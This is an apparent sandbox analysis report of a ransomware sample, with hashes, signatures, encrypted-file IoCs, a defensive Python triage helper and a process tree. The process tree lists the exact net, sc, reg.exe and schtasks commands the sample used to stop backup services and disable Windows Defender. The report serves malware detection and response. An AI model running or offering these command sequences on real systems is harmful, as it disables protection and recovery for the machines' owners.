Analysis
max time kernel: 115s
max time network: 117s
platform: windows10_x64
resource: win10-en-20211208
submitted: 13-01-2022 09:43
Static task: static1
Behavioral task: behavioral1
  Sample: 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe
  Resource: win7-en-20211208
Behavioral task: behavioral2
  Sample: 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe
  Resource: win10-en-20211208
General
Target: 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe
Size: 2.8MB
MD5: 4cd47497f204e06035a82dbf52b39fec
SHA1: bd07c57aead84fec6fac5eaa85d6ee5fb35bd4b8
SHA256: 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083
SHA512: f44a9c987946fcbfc19264915150ec150f65fe6aebf70cc3a48b38a4bb28d080cdd685290cae0462eb925dbede38b79c959fc45fb0486a136a2681461ab313f6
Malware Config
Signatures
Deletes Windows Defender Definitions (2 TTPs, 1 IoC)
Uses the MpCmdRun utility to delete all AV definitions.
Processes:
  pid   process
  3708  MpCmdRun.exe
Modifies security service (2 TTPs, 1 IoC)
Start = 4 is SERVICE_DISABLED: the Microsoft Defender Antivirus service (WinDefend) will not start on the next boot.
Processes:
  description      ioc                                                                    process
  Set value (int)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"  reg.exe
Clears Windows event logs (1 TTP)
The three wevtutil.exe processes listed under "Suspicious use of AdjustPrivilegeToken" below (PIDs 1244, 2840, 2028) enabled SeSecurityPrivilege and SeBackupPrivilege, which wevtutil needs in order to clear the Security log.
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.
Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
Two bcdedit.exe invocations; their command lines fall outside the truncated process listing below.
Processes:
  pid   process
  3844  bcdedit.exe
  3884  bcdedit.exe
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials and other secrets.
Drops file in Program Files directory (64 IoCs)
Processes:
  description: File opened for modification (all 64 rows)
  process: 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe (all 64 rows)
  ioc:
  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailSmallTile.scale-200.png
  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\selection-actions2x.png.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_tii2gTQaD-A0.rmvlh
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.zh_CN_5.5.0.165303.jar.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_t0f5Y39cnIU0.rmvlh
  C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Subscription1-ul-oob.xrm-ms.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_9gHqoKMFziE0.rmvlh
  C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_1.4.101.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\StoreLogo.scale-100.png
  C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\Assets\Sounds\Saving_Contact.wav
  C:\Program Files\Common Files\System\Ole DB\es-ES\sqlxmlx.rll.mui.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_iI3fXRwAzy80.rmvlh
  C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\8041_32x32x32.png
  C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-32_altform-unplated.png
  C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsAppList.scale-200.png
  C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp6-ppd.xrm-ms.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_ReEhstsEaVo0.rmvlh
  C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_neutral_split.scale-150_8wekyb3d8bbwe\Assets\starttile.smile.small.scale-150.png
  C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Jumbo\mask\13s.png
  C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\Images\Ratings\Yelp10.scale-100.png
  C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Resources\1033\msmdsrv.rll.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_4Ww2MCI5RVo0.rmvlh
  C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_1.4.101.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\LockScreenLogo.scale-100.png
  C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\uy_60x42.png
  C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\_Resources\6.rsrc
  C:\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml
  C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Work\LTR\LargeTile.scale-200.png
  C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-96_contrast-high.png
  C:\Program Files\Common Files\microsoft shared\ink\en-US\delete.avi
  C:\Program Files\Microsoft Office\root\Templates\1033\TimelessReport.dotx.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_Qer47oL-vbE0.rmvlh
  C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Audio\slide_in.wav
  C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\kg_16x11.png
  C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-180_8wekyb3d8bbwe\Assets\Office\ResetCoord.scale-180.png
  C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Tiles\klondike.jpg
  C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\Assets\Retail\Retail_Feedback_icon.png
  C:\Program Files (x86)\Common Files\System\ado\en-US\msader15.dll.mui
  C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-black_targetsize-24.png
  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fi-fi\ui-strings.js.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_nwZFwoEghj80.rmvlh
  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\uk-ua\ui-strings.js.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_S7msAXLLV380.rmvlh
  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\dd_arrow_small.png.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_X1I-VTexe300.rmvlh
  C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\NewCommentRTL.White@3x.png.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_J3KIiMV5mK40.rmvlh
  C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageAppList.targetsize-72_contrast-black.png
  C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Jumbo\jumbo_1d.png
  C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteNotebookMedTile.scale-100.png
  C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\ISO690.XSL.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_4RPmkPOfcHE0.rmvlh
  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\adobe_sign_tag_retina.png.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_CTj-8bO0tFw0.rmvlh
  C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageBadgeLogo.scale-200_contrast-black.png
  C:\Program Files\Microsoft Office\root\Office16\Bibliography\Sort\TAG.XSL.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_kCNNyX4HzL00.rmvlh
  C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\comments.win32.bundle.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_RmeggKMe-ww0.rmvlh
  C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\AppPackageMedTile.scale-200.png
  C:\Program Files\Common Files\microsoft shared\ink\fr-CA\tipresx.dll.mui
  C:\Program Files\VideoLAN\VLC\lua\meta\art\03_lastfm.luac.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_V8kkclVirGU0.rmvlh
  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\root\ui-strings.js.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_CEJ-t4GjSgc0.rmvlh
  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\4774_40x40x32.png
  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarAppList.targetsize-40_altform-unplated.png
  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover_2x.png.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_dwe----oYso0.rmvlh
  C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019DemoR_BypassTrial180-ul-oob.xrm-ms.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_FTyJzi1wrJk0.rmvlh
  C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_Planet.png
  C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\1113_20x20x32.png
  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_ellipses-hover.svg.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_sSOka5XTdik0.rmvlh
  C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019R_Trial-pl.xrm-ms.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_AB6Y1puihvA0.rmvlh
  C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Logos\BadgeLogo\PaintApplist.scale-150.png
  C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\RTL\contrast-black\SmallTile.scale-200.png
  C:\Program Files\Microsoft Office\root\Licenses16\VisioStdO365R_SubTest-ppd.xrm-ms.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_pU8SmKIHsV00.rmvlh
  C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\UX\Controls\Xbox360PurchaseControl\Xbox360PurchaseHostPage.html
  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\5941_20x20x32.png
  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\LinkedInboxLargeTile.scale-100.png
  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\tr-tr\ui-strings.js.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_zLYssWBObS00.rmvlh
  C:\Program Files\Microsoft Office\root\Licenses16\VisioProO365R_Subscription-ul-oob.xrm-ms.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_rmz_MAepkj80.rmvlh
  C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\MainPageState2\freecell_bp_920.jpg
  C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\AppxSignature.p7x
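Two kinds of entry appear in the 64 rows above: files that keep their name and were only opened (mostly WindowsApps assets), and files renamed to <original name>.<marker>_<tail>.rmvlh, where the marker is the same 43-character string on every renamed file (N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj) and the 12-character tail differs per file; both use only the base64url alphabet and every tail ends in 0. The helper below is an added example, not part of the sandbox report: it splits a path into those parts so a responder can count encrypted files, recover original names for a later decryption pass, and confirm the marker is constant across a run. The six sample paths are copied from the list above; what the marker and the tail encode is not stated in the report and is not assumed here.

```python
"""Triage helper for the 'File opened for modification' IoCs above.

Added example; it is not part of the sandbox report. The name layout
<original>.<marker>_<tail>.rmvlh is read off the listed paths. What the
marker and the tail encode is not stated in the report and is not assumed.
"""
import ntpath
import re
from collections import Counter
from dataclasses import dataclass
from typing import Iterable, List, Optional

RANSOM_EXT = ".rmvlh"

# Marker and tail use only base64url characters [A-Za-z0-9_-]. The marker in
# the report contains no "_", so the first "_" splits marker from tail; the
# tail itself may contain "_" (e.g. "rmz_MAepkj80").
_BLOB_RE = re.compile(r"^(?P<marker>[A-Za-z0-9-]+)_(?P<tail>[A-Za-z0-9_-]+)$")


@dataclass(frozen=True)
class EncryptedName:
    directory: str
    original: str  # file name before the ransomware renamed it
    marker: str    # identical for every encrypted file in this run
    tail: str      # differs per file

    def original_path(self) -> str:
        return ntpath.join(self.directory, self.original)


def parse_encrypted_name(path: str) -> Optional[EncryptedName]:
    """Split a Windows path into (directory, original, marker, tail), or
    return None when the file name does not carry the appended layout."""
    directory, name = ntpath.split(path)
    if not name.endswith(RANSOM_EXT):
        return None
    stem = name[: -len(RANSOM_EXT)]
    # Neither marker nor tail contains ".", so the last "." ends the original name.
    original, dot, blob = stem.rpartition(".")
    if not dot or not original:
        return None
    m = _BLOB_RE.match(blob)
    if m is None:
        return None
    return EncryptedName(directory, original, m["marker"], m["tail"])


def triage(paths: Iterable[str]) -> dict:
    """Separate encrypted files from files that were only opened and summarise
    the marker(s) seen. More than one marker in a single run would mean the
    marker is not a per-run constant; the Counter makes that visible."""
    encrypted: List[EncryptedName] = []
    opened_only: List[str] = []
    for p in paths:
        parsed = parse_encrypted_name(p)
        if parsed is None:
            opened_only.append(p)
        else:
            encrypted.append(parsed)
    tails = [e.tail for e in encrypted]
    return {
        "encrypted": encrypted,
        "opened_only": opened_only,
        "markers": Counter(e.marker for e in encrypted),
        "tails_unique": len(set(tails)) == len(tails),
    }


# Six paths copied from the IoC list above (four renamed, two untouched).
SAMPLE_PATHS = [
    r"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\selection-actions2x.png.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_tii2gTQaD-A0.rmvlh",
    r"C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.zh_CN_5.5.0.165303.jar.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_t0f5Y39cnIU0.rmvlh",
    r"C:\Program Files\Microsoft Office\root\Licenses16\VisioProO365R_Subscription-ul-oob.xrm-ms.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_rmz_MAepkj80.rmvlh",
    r"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover_2x.png.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_dwe----oYso0.rmvlh",
    r"C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\Assets\Sounds\Saving_Contact.wav",
    r"C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\AppxSignature.p7x",
]


if __name__ == "__main__":
    result = triage(SAMPLE_PATHS)
    print(f"encrypted: {len(result['encrypted'])}, opened only: {len(result['opened_only'])}")
    for marker, n in result["markers"].items():
        print(f"marker {marker} on {n} file(s)")
    for e in result["encrypted"]:
        print(f"{e.tail}  <-  {e.original_path()}")
```

ntpath is used on purpose so the backslash paths parse correctly when the script is run on a Linux analysis box; feeding it the full 64-row list from a Triage export is a matter of replacing SAMPLE_PATHS.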
Launches sc.exe
sc.exe is a Windows utility that controls services on the system.
Interacts with shadow copies (2 TTPs, 1 IoC)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
  pid   process
  3400  vssadmin.exe
Modifies registry class (3 IoCs)
EPP is the Windows Defender shell extension that adds the "Scan with Microsoft Defender" entry to the Explorer context menu; deleting it under *, Directory and Drive removes that entry for files, folders and drives.
Processes:
  description  ioc                                                                         process
  Key deleted  \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP          reg.exe
  Key deleted  \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP  reg.exe
  Key deleted  \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP      reg.exe
Runs net.exe
The process tree below shows nine "net stop <service> /y" invocations (SamSs, SDRSVC, SstpSvc, UI0Detect, vmicvss, VSS, wbengine, WebClient, UnistoreSvc_12cbe), followed by "sc config <service> start= disabled" for each of the same nine services.
Suspicious behavior: EnumeratesProcesses (8 IoCs)
Processes:
  pid   process
  828   powershell.exe (listed three times)
  1248  powershell.exe (listed three times)
  2428  9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe (listed twice)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
The wmic.exe rows list every privilege the process holds, which is what wmic.exe does at start-up regardless of the query it runs, so those rows say little on their own; the wevtutil.exe rows (SeSecurityPrivilege and SeBackupPrivilege) are the ones that line up with the "Clears Windows event logs" signature.
Processes:
  description                       pid   process
  Token: SeSecurityPrivilege        1244  wevtutil.exe
  Token: SeBackupPrivilege          1244  wevtutil.exe
  Token: SeSecurityPrivilege        2840  wevtutil.exe
  Token: SeBackupPrivilege          2840  wevtutil.exe
  Token: SeSecurityPrivilege        2028  wevtutil.exe
  Token: SeBackupPrivilege          2028  wevtutil.exe
  wmic.exe PID 692 and wmic.exe PID 876 each enabled, in this order: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36. The PID 876 list is repeated a second time and is cut at SeUndockPrivilege by the 64-entry cap.
Suspicious use of WriteProcessMemory (64 IoCs)
Each parent/child pair below appears twice in the report. A parent writing into a child it has just created is part of normal process start-up, so the signal here is the fan-out (one process spawning nine net.exe, nine sc.exe and a run of reg.exe children), not any single write.
Processes (sample.exe = 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe):
  source pid  source process  target pid  target process
  2428        sample.exe      936         net.exe
  936         net.exe         2980        net1.exe
  2428        sample.exe      3340        net.exe
  3340        net.exe         3784        net1.exe
  2428        sample.exe      3292        net.exe
  3292        net.exe         364         net1.exe
  2428        sample.exe      3644        net.exe
  3644        net.exe         636         net1.exe
  2428        sample.exe      1236        net.exe
  1236        net.exe         1248        net1.exe
  2428        sample.exe      1140        net.exe
  1140        net.exe         508         net1.exe
  2428        sample.exe      884         net.exe
  884         net.exe         3580        net1.exe
  2428        sample.exe      2264        net.exe
  2264        net.exe         1036        net1.exe
  2428        sample.exe      356         net.exe
  356         net.exe         2212        net1.exe
  2428        sample.exe      1348        sc.exe
  2428        sample.exe      2304        sc.exe
  2428        sample.exe      1932        sc.exe
  2428        sample.exe      1912        sc.exe
  2428        sample.exe      1964        sc.exe
  2428        sample.exe      2228        sc.exe
  2428        sample.exe      2876        sc.exe
  2428        sample.exe      3600        sc.exe
  2428        sample.exe      996         sc.exe
  2428        sample.exe      608         reg.exe
  2428        sample.exe      2520        reg.exe
  2428        sample.exe      3744        reg.exe
  2428        sample.exe      3220        reg.exe
  2428        sample.exe      3576        reg.exe
Processes
[1] C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe (PID 2428)
    cmd: "C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe"
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    [2] C:\Windows\SYSTEM32\net.exe (PID 936)
        cmd: net.exe stop "SamSs" /y
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\net1.exe (PID 2980)
            cmd: C:\Windows\system32\net1 stop "SamSs" /y
    [2] C:\Windows\SYSTEM32\net.exe (PID 3340)
        cmd: net.exe stop "SDRSVC" /y
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\net1.exe (PID 3784)
            cmd: C:\Windows\system32\net1 stop "SDRSVC" /y
    [2] C:\Windows\SYSTEM32\net.exe (PID 3292)
        cmd: net.exe stop "SstpSvc" /y
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\net1.exe (PID 364)
            cmd: C:\Windows\system32\net1 stop "SstpSvc" /y
    [2] C:\Windows\SYSTEM32\net.exe (PID 3644)
        cmd: net.exe stop "UI0Detect" /y
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\net1.exe (PID 636)
            cmd: C:\Windows\system32\net1 stop "UI0Detect" /y
    [2] C:\Windows\SYSTEM32\net.exe (PID 1236)
        cmd: net.exe stop "vmicvss" /y
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\net1.exe (PID 1248)
            cmd: C:\Windows\system32\net1 stop "vmicvss" /y
    [2] C:\Windows\SYSTEM32\net.exe (PID 1140)
        cmd: net.exe stop "VSS" /y
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\net1.exe (PID 508)
            cmd: C:\Windows\system32\net1 stop "VSS" /y
    [2] C:\Windows\SYSTEM32\net.exe (PID 884)
        cmd: net.exe stop "wbengine" /y
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\net1.exe (PID 3580)
            cmd: C:\Windows\system32\net1 stop "wbengine" /y
    [2] C:\Windows\SYSTEM32\net.exe (PID 2264)
        cmd: net.exe stop "WebClient" /y
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\net1.exe (PID 1036)
            cmd: C:\Windows\system32\net1 stop "WebClient" /y
    [2] C:\Windows\SYSTEM32\net.exe (PID 356)
        cmd: net.exe stop "UnistoreSvc_12cbe" /y
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\net1.exe (PID 2212)
            cmd: C:\Windows\system32\net1 stop "UnistoreSvc_12cbe" /y
    [2] C:\Windows\SYSTEM32\sc.exe (PID 1348)
        cmd: sc.exe config "SamSs" start= disabled
    [2] C:\Windows\SYSTEM32\sc.exe (PID 2304)
        cmd: sc.exe config "SDRSVC" start= disabled
    [2] C:\Windows\SYSTEM32\sc.exe (PID 1932)
        cmd: sc.exe config "SstpSvc" start= disabled
    [2] C:\Windows\SYSTEM32\sc.exe (PID 1912)
        cmd: sc.exe config "UI0Detect" start= disabled
    [2] C:\Windows\SYSTEM32\sc.exe (PID 1964)
        cmd: sc.exe config "vmicvss" start= disabled
    [2] C:\Windows\SYSTEM32\sc.exe (PID 2228)
        cmd: sc.exe config "VSS" start= disabled
    [2] C:\Windows\SYSTEM32\sc.exe (PID 2876)
        cmd: sc.exe config "wbengine" start= disabled
    [2] C:\Windows\SYSTEM32\sc.exe (PID 3600)
        cmd: sc.exe config "WebClient" start= disabled
    [2] C:\Windows\SYSTEM32\sc.exe (PID 996)
        cmd: sc.exe config "UnistoreSvc_12cbe" start= disabled
    [2] C:\Windows\SYSTEM32\reg.exe (PID 608)
        cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
    [2] C:\Windows\SYSTEM32\reg.exe (PID 2520)
        cmd: reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
    [2] C:\Windows\SYSTEM32\reg.exe (PID 3744)
        cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
    [2] C:\Windows\SYSTEM32\reg.exe (PID 3220)
        cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
    [2] C:\Windows\SYSTEM32\reg.exe (PID 3576)
        cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
    [2] C:\Windows\SYSTEM32\reg.exe (PID 1416)
        cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
    [2] C:\Windows\SYSTEM32\reg.exe (PID 1652)
        cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
    [2] C:\Windows\SYSTEM32\reg.exe (PID 1916)
        cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
    [2] C:\Windows\SYSTEM32\reg.exe (PID 2312)
        cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
    [2] C:\Windows\SYSTEM32\reg.exe (PID 3784)
        cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
    [2] C:\Windows\SYSTEM32\reg.exe (PID 3360)
        cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
    [2] C:\Windows\SYSTEM32\reg.exe (PID 3276)
        cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
    [2] C:\Windows\SYSTEM32\reg.exe (PID 728)
        cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
    [2] C:\Windows\SYSTEM32\reg.exe (PID 1240)
        cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
    [2] C:\Windows\SYSTEM32\reg.exe (PID 1020)
        cmd: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
    [2] C:\Windows\SYSTEM32\reg.exe (PID 2508)
        cmd: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
    [2] C:\Windows\SYSTEM32\schtasks.exe (PID 704)
        cmd: schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
